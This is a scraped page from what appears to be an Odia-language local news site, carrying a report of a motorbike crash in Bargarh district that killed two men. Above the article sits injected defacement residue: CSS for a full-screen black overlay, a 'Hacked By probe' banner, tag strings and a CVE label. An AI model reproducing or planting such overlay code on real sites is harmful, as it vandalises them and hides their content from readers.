html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMP4RL9UXPK
`58; Hacked By probe `68;
[ HXIMP4rl9uxpk ]
HXIMP4rl9uxpk
CVE-2026-49049 | import vector

ମର୍ମନ୍ତୁଦ ସଡକ ଦୁର୍ଘଟଣାରେ ଦୁଇ ମୃତ

User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

ବରଗଡ :- ବରଗଡ଼ ଜିଲ୍ଲା ପଦ୍ମପୁର ଉପଖଣ୍ଡ ପାଇକମାଲ ବ୍ଲକ ଲହଙ୍ଗେର ଗ୍ରାମରେ ଆଜି ଦୀପହରେ ଏକ ମର୍ମନ୍ତୁଦ ସଡକ ଦୁର୍ଘଟଣା ଘଟି ଯାଇଛି । ପ୍ରାପ୍ତ ସୂଚନା ଅନୁସାରେ ଲହଙ୍ଗେର ଗ୍ରାମର ବିକ୍ରମ ପ୍ରଧାନ (25) ଓ ଈଶ୍ୱର ସେଠ (୩୯) ଉଭୟ ଏକ ବାଇକ ରେ ସାପଲହର ଆଡକୁ ଯାଉଥିବା ସମୟରେ ଭାରସାମ୍ୟ ହରାଇ ବାଇକ ଏକ ଗଛର ପିଟି ହୋଇଥିଲେ । ଫଳରେ ଘଟଣା ସ୍ଥଳରେ ଉଭୟ ଗୁରୁତର ଭାବରେ ଆହତ ହୋଇଥିଲେ । ଗ୍ରାମବାସୀ ମାନେ ଏହି ଘଟଣା ବାବଦରେ ଜଗଦଲପୁର ଥାନାକୁ ଜଣାଇବା ସହିତ ଆମ୍ବୁଲାନ୍ସ କୁ ଡାକି ଉଭୟ ଙ୍କୁ ପଦ୍ମପୁର ଡାକ୍ତରଖାନା କୁ ପଠାଇ ଦେଇଥିଲେ । ପଦ୍ମପୁର ରେ ଚିକିତ୍ସାଧୀନ ଅବସ୍ଥାରେ ଉଭୟଙ୍କର ମୃତ୍ୟୁ ହୋଇଯାଇଥିଲା । ଜଗଦଲପୁର ଥାନା ଅଧିକାରୀ ଙ୍କର ନିର୍ଦେଶରେ ଶ୍ରୀ ପ୍ରଦୀପ କୁମାର ପାଣି ଥାନାରେ ମାମଲା ରୁଜୁ କରି ଘଟଣାର ତଦନ୍ତ ଜାରି ରଖିଛନ୍ତି । ଶେଷ ସୂଚନା ଅନୁସାରେ ଶବ ବ୍ୟବଚ୍ଛେଦ ପରେ ସନ୍ଧ୍ୟା ସମୟରେ ଶବ ପରିବାର ଲୋକଙ୍କୁ ହସ୍ତାନ୍ତର କରାଯାଇଛି ।

0
0
0
s2sdefault